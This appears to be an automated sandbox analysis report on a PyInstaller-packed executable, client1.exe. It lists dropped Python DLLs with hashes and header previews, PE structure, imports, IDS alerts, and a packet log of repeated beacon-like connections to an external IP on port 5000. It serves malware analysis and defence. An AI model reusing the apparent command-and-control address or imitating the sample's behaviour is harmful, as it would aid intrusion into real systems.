                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m{..).e.).e.).e..fm.(.e..fe.(.e..f..(.e..fg.(.e.Rich).e.........PE..d....~.c.........." ...".............................................................'....`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\python311.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5764888
                                                  Entropy (8bit):6.090010350264476
                                                  Encrypted:false
                                                  SSDEEP:98304:ZjCxzAISyt+EaudO141ibXHkMLyP59mJ3:ZjCxzAISXElO13L09
                                                  MD5:1FE47C83669491BF38A949253D7D960F
                                                  SHA1:DE5CC181C0E26CBCB31309FE00D9F2F5264D2B25
                                                  SHA-256:0A9F2C98F36BA8974A944127B5B7E90E638010E472F2EB6598FC55B1BDA9E7AE
                                                  SHA-512:05CC6F00DB128FBCA02A14F60F86C049855F429013F65D91E14EA292D468BF9BFDEEBC00EC2D54A9FB5715743A57AE3AB48A95037016240C02AABE4BFA1A2FF4
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.K.*.K.*.K.*...+.I.*.....E.*.../.G.*.....C.*...).O.*.B..Q.*...+.@.*.K.+...*..'..*..*.J.*....J.*..(.J.*.RichK.*.........................PE..d....~.c.........." ...".b%..27.....LP........................................\......hX...`..........................................@.....|eA.......[.......V.@0....W../....[..C....).T...........................`.).@.............%..............................text...z`%......b%................. ..`.rdata........%......f%.............@..@.data.........A..L...pA.............@....pdata..@0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc.........[......zV.............@..@.reloc...C....[..D....V.............@..B........................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\select.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):30488
                                                  Entropy (8bit):6.579636105002456
                                                  Encrypted:false
                                                  SSDEEP:384:N1ecReJKCHqeUI7A700EZ9IJQGzHQIYiSy1pCQ82Pxh8E9VF0Nyqnn:3eUeJPHqgbD9IJQGD5YiSyvxPxWEUn
                                                  MD5:4AC28414A1D101E94198AE0AC3BD1EB8
                                                  SHA1:718FBF58AB92A2BE2EFDB84D26E4D37EB50EF825
                                                  SHA-256:B5D4D5B6DA675376BD3B2824D9CDA957B55FE3D8596D5675381922EF0E64A0F5
                                                  SHA-512:2AC15E6A178C69115065BE9D52C60F8AD63C2A8749AF0B43634FC56C20220AFB9D2E71EBED76305D7B0DCF86895ED5CDFB7D744C3BE49122286B63B5EBCE20C2
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..t'..t'..t'..'..t'..u&..t'..q&..t'..p&..t'..w&..t'/.u&..t'..u'..t'..u&..t'/.y&..t'/.t&..t'/..'..t'/.v&..t'Rich..t'................PE..d....~.c.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.768313155210846
                                                  Encrypted:false
                                                  SSDEEP:768:PO5I0/HK2dBQ5JbLo9rq3dr+3dojai/Ik:W5I0v4JooNr+3bi/I
                                                  MD5:C4A494509BF44E06447788B24881C16D
                                                  SHA1:E01A29B8E2AF102EC2F8C88F9B580F004411F9B3
                                                  SHA-256:BC15B60DA221F8656CDB201198AB7FA2575AD8D41C357B67B8678F9BBF3961AF
                                                  SHA-512:2DEC6757E4580657FC1A42D1D83FBFA144570508172990D8F2268292542A93FFE498881BD7FDD26CA83B61E5A861A8A1C692C133C599028F23C1878A746F691E
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.v}r...r...r...{...v...../p...9../p...../~...../z...../q....../q...r........../s....../s.......s....../s...Richr...........PE..d...uK.e.........." ...#.^...@.......a....................................................`.........................................@...d.......x...............t...................P...................................@............p..P............................text....\.......^.................. ..`.rdata...$...p...&...b..............@..@.data... ...........................@....pdata..t...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1141016
                                                  Entropy (8bit):5.435126675528636
                                                  Encrypted:false
                                                  SSDEEP:12288:r3kYbfjwR6nbnonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1y:rUYbM60IDJcjEwPgPOG6Xyd461y
                                                  MD5:2AB7E66DFF1893FEA6F124971221A2A9
                                                  SHA1:3BE5864BC4176C552282F9DA5FBD70CC1593EB02
                                                  SHA-256:A5DB7900ECD5EA5AB1C06A8F94B2885F00DD2E1ADF34BCB50C8A71691A97804F
                                                  SHA-512:985480FFFCC7E1A25C0070F44492744C3820334A35B9A72B9147898395AB60C7A73EA8BBC761DE5CC3B6F8799D07A96C2880A7B56953249230B05DD59A1390AD
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t.t.t.}...r.;...v.;...y.;...|.;...w.....w.?...v.t.%.....u.....u...y.u.....u.Richt.........................PE..d....~.c.........." ...".@..........P*...................................................`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................

                                                  C:\images\new214_173.254.250.69.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):575113
                                                  Entropy (8bit):7.924484848440919
                                                  Encrypted:false
                                                  SSDEEP:12288:j1cEVzOz9vxNfpI+6aaYqsQSRrmBcUwrZAVfS2Go0sz6ByRNpLO8Zyh5KqOfgDn:j1cRPNBICI5SkjwrwSizBDpLO8Zyh5Ko
                                                  MD5:6B536DEE4416343E0DED1ED6D83DDABD
                                                  SHA1:96B6C9B48F32D3B0B266ED76F3BDCEFE21E77E2C
                                                  SHA-256:2FB8BAE544BA13934A0039C91C14B40294653FA4A41642393842FB9B9DBE815E
                                                  SHA-512:5E112C8AB9FA4E4B2C9284F47264DF0D2924971DB36CB61CED7F4E01AF3C2B9D30065B49FAAB89B71F937A0CFED3ADAA377F1399C7628EC4F73749A08690B3DA
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............1.c....PIDATx..i.\..3.f.....7.D..O.....Gw......F.f4..$!..x....`<0.13...`...4TI5WI........%$......^..3.2.*U....o....._O...7..}4.:....:.,<.Ut.`.*..@+x....R..S...\=.A..S.J.J=.A.5...y0..........m../.R._.W.}{../.J.g0..^...T......sw.J.QF.n.U...J......._.(R.Q..mg...O./..?yop.w+....[iS...)...mee~.N..[m.~.%o.o`.S.R..Zbe..6+...%.w.*.R..."....J}{c..J.k..onBer+...eU.......W..qM_.z..\.W...P.+]..xU...^G.G\..Q....].YZg.J_...K.2....}U..5.E.k/YWs.Z[.........Z...B.L....j.wS...........q...<.../..U...Q...aa.}Tj.J....W...u.V.....Uw.*m..X...W.................;u..p.5.gp....a~_..U....k........&.......6=..W[.A......:3.+}n'*uN.o..?o%.:.k..........f....J.......U7...`..<.......a\q.....u.v..+......"3...5....V3...Ez.rTf.ix....6.}.......I+.g/.nj;....-..&...)mZ.."..Z?..nr[.V\..9{EzBKf.r,p.,.`........,.1KR..4....<.o...7.J....I.........\.n..+.f.7c..;..vBk...u...&u.6=.%8sI..N>.[...g..}..X.....1..#(.y.....

                                                  Static File Info

                                                  General

                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):7.9945178866309865
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:client1.exe
                                                  File size:11'677'281 bytes
                                                  MD5:950c13286d42ad2da05b1778c1e2d747
                                                  SHA1:3096643a168bcc2841592c676237aa6f1132ce4c
                                                  SHA256:31c85a75181aaacb26b304987e11920b59fadea48f15dc6996c4e5d48a1b41e0
                                                  SHA512:3e47cf1a8d4be4f918c10de572b1084f930a2c6c8553e6bebfc932a668cc00dece605caf3e0c5527bcb7fe4f9686e80182b5c4483e607142859c34585963b065
                                                  SSDEEP:196608:RCtKucDPzMsVerPYVnN/SMFmHxbAQvVwejuJDUX47dwdW0uBJ1LJHD2g1YPeZNt/:QKgPYVnNSMsxNaUX47d4YbZfg4
                                                  TLSH:B3C633A856B10DE7DDACD239D0E189506772BC660BF0E38F03A581722F73BE5A435729
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W.../...W.../...W.../...W...+l..W...+...W...+...W...+...W.../...W...W..)W..e+...W..e+...W..Rich.W.................

                                                  File Icon

                                                  Icon Hash:4a464cd47461e179

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x14000b310
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66E5A2CC [Sat Sep 14 14:50:52 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:2
                                                  File Version Major:5
                                                  File Version Minor:2
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:2
                                                  Import Hash:0b5552dccd9d0a834cea55c0c8fc05be

                                                  Entrypoint Preview

                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F8DE1187A3Ch
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F8DE118764Fh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F8DE1187FB4h
                                                  test eax, eax
                                                  je 00007F8DE11877F3h
                                                  dec eax
                                                  mov eax, dword ptr [00000030h]
                                                  dec eax
                                                  mov ecx, dword ptr [eax+08h]
                                                  jmp 00007F8DE11877D7h
                                                  dec eax
                                                  cmp ecx, eax
                                                  je 00007F8DE11877E6h
                                                  xor eax, eax
                                                  dec eax
                                                  cmpxchg dword ptr [0004121Ch], ecx
                                                  jne 00007F8DE11877C0h
                                                  xor al, al
                                                  dec eax
                                                  add esp, 28h
                                                  ret
                                                  mov al, 01h
                                                  jmp 00007F8DE11877C9h
                                                  int3
                                                  int3
                                                  int3
                                                  inc eax
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  movzx eax, byte ptr [00041207h]
                                                  test ecx, ecx
                                                  mov ebx, 00000001h
                                                  cmove eax, ebx
                                                  mov byte ptr [000411F7h], al
                                                  call 00007F8DE1187DB3h
                                                  call 00007F8DE1188EE2h
                                                  test al, al
                                                  jne 00007F8DE11877D6h
                                                  xor al, al
                                                  jmp 00007F8DE11877E6h
                                                  call 00007F8DE11954C1h
                                                  test al, al
                                                  jne 00007F8DE11877DBh
                                                  xor ecx, ecx
                                                  call 00007F8DE1188EF2h
                                                  jmp 00007F8DE11877BCh
                                                  mov al, bl
                                                  dec eax
                                                  add esp, 20h
                                                  pop ebx
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  inc eax
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  cmp byte ptr [000411BCh], 00000000h
                                                  mov ebx, ecx
                                                  jne 00007F8DE1187839h
                                                  cmp ecx, 01h
                                                  jnbe 00007F8DE118783Ch
                                                  call 00007F8DE1187F1Ah
                                                  test eax, eax
                                                  je 00007F8DE11877FAh

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3bd0c0x78.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000xf49c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4e0000x20c4.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x758.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x394800x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x393400x140.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x418.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x288000x28800443d51fb84559b563832949912f06b00False0.5583465952932098data6.488023200564254IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x2a0000x12b160x12c00c6b0ffbdaacfaeb0aa8a402d7fb00a75False0.5154817708333334data5.824698040892216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x3d0000x103f80xe00afabb66fdcd2825de5909f10c900fca7False0.13309151785714285DOS executable (block device driver \377\3)1.8096886543499544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x4e0000x20c40x22007b210ceebebc00c96d1c55c2b456bbb4False0.47794117647058826data5.274096406482418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  _RDATA0x510000x15c0x200c059b775abce97446903f3597b027faeFalse0.384765625data2.808567494642619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0x520000xf49c0xf6001273c8b32d60012638cc8eef409fdb8dFalse0.803639481707317data7.555569735712573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x620000x7580x80011aaafc72361ec8886a740c3e209ceb3False0.544921875data5.2576643703968475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x522080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.585820895522388
                                                  RT_ICON0x530b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7360108303249098
                                                  RT_ICON0x539580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.755057803468208
                                                  RT_ICON0x53ec00x952cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9975384937676757
                                                  RT_ICON0x5d3ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3887966804979253
                                                  RT_ICON0x5f9940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.49530956848030017
                                                  RT_ICON0x60a3c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7207446808510638
                                                  RT_GROUP_ICON0x60ea40x68data0.7019230769230769
                                                  RT_MANIFEST0x60f0c0x58fXML 1.0 document, ASCII text, with CRLF line terminators0.4462403373155306

                                                  Imports

                                                  DLLImport
                                                  USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                  COMCTL32.dll
                                                  KERNEL32.dllGetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                  ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                  GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-04T09:49:36.882714+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849712TCP
                                                  2024-11-04T09:50:15.115068+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849723TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 4, 2024 09:49:20.924143076 CET497065000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:20.929069042 CET500049706146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:20.929153919 CET497065000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:20.929239035 CET497065000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:20.934107065 CET500049706146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:21.057028055 CET4970980192.168.2.8172.67.168.106
                                                  Nov 4, 2024 09:49:21.061949968 CET8049709172.67.168.106192.168.2.8
                                                  Nov 4, 2024 09:49:21.062035084 CET4970980192.168.2.8172.67.168.106
                                                  Nov 4, 2024 09:49:21.062191010 CET4970980192.168.2.8172.67.168.106
                                                  Nov 4, 2024 09:49:21.066981077 CET8049709172.67.168.106192.168.2.8
                                                  Nov 4, 2024 09:49:21.440663099 CET500049706146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:21.440793991 CET497065000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:21.440939903 CET497065000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:21.445729971 CET500049706146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:21.781905890 CET8049709172.67.168.106192.168.2.8
                                                  Nov 4, 2024 09:49:21.787750959 CET4970980192.168.2.8172.67.168.106
                                                  Nov 4, 2024 09:49:21.793241978 CET8049709172.67.168.106192.168.2.8
                                                  Nov 4, 2024 09:49:21.793314934 CET4970980192.168.2.8172.67.168.106
                                                  Nov 4, 2024 09:49:26.444034100 CET497105000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:26.449027061 CET500049710146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:26.449110031 CET497105000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:26.449234009 CET497105000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:26.454005957 CET500049710146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:26.961116076 CET500049710146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:26.961177111 CET497105000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:26.961293936 CET497105000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:26.966069937 CET500049710146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:31.963682890 CET497115000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:31.968488932 CET500049711146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:31.968595982 CET497115000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:31.968652010 CET497115000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:31.973448038 CET500049711146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:32.473484993 CET500049711146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:32.473730087 CET497115000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:32.473879099 CET497115000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:32.478615046 CET500049711146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:37.492363930 CET497165000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:37.497279882 CET500049716146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:37.497600079 CET497165000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:37.516756058 CET497165000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:37.521595955 CET500049716146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:38.005829096 CET500049716146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:38.005904913 CET497165000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:38.006294012 CET497165000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:38.011055946 CET500049716146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:43.021325111 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.026103973 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:43.026171923 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.029470921 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.034316063 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:43.536169052 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:43.536421061 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.536545038 CET497175000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:43.541255951 CET500049717146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:48.538871050 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:48.543811083 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:48.543936014 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:48.544023991 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:48.548830032 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:49.051907063 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:49.052043915 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:49.070000887 CET497185000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:49.076317072 CET500049718146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.072217941 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.077101946 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.077218056 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.077294111 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.082041979 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.583244085 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:54.583304882 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.583425045 CET497195000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:54.588185072 CET500049719146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:59.586015940 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:59.590831041 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:49:59.590965986 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:59.591022968 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:49:59.595783949 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:00.103120089 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:00.103204012 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:00.103322983 CET497205000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:00.108088017 CET500049720146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.105369091 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.110261917 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.110358000 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.110410929 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.115412951 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.615422010 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:05.615624905 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.615804911 CET497215000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:05.620604038 CET500049721146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:10.618227005 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:10.623073101 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:10.623153925 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:10.623347998 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:10.628106117 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:11.135529995 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:11.135600090 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:11.135745049 CET497225000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:11.140582085 CET500049722146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.138068914 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.253690004 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.253829956 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.290586948 CET497245000192.168.2.8146.70.87.211
                                                  Nov 4, 2024 09:50:16.296114922 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.775443077 CET500049724146.70.87.211192.168.2.8
                                                  Nov 4, 2024 09:50:16.775662899 CET497245000192.168.2.8146.70.87.211
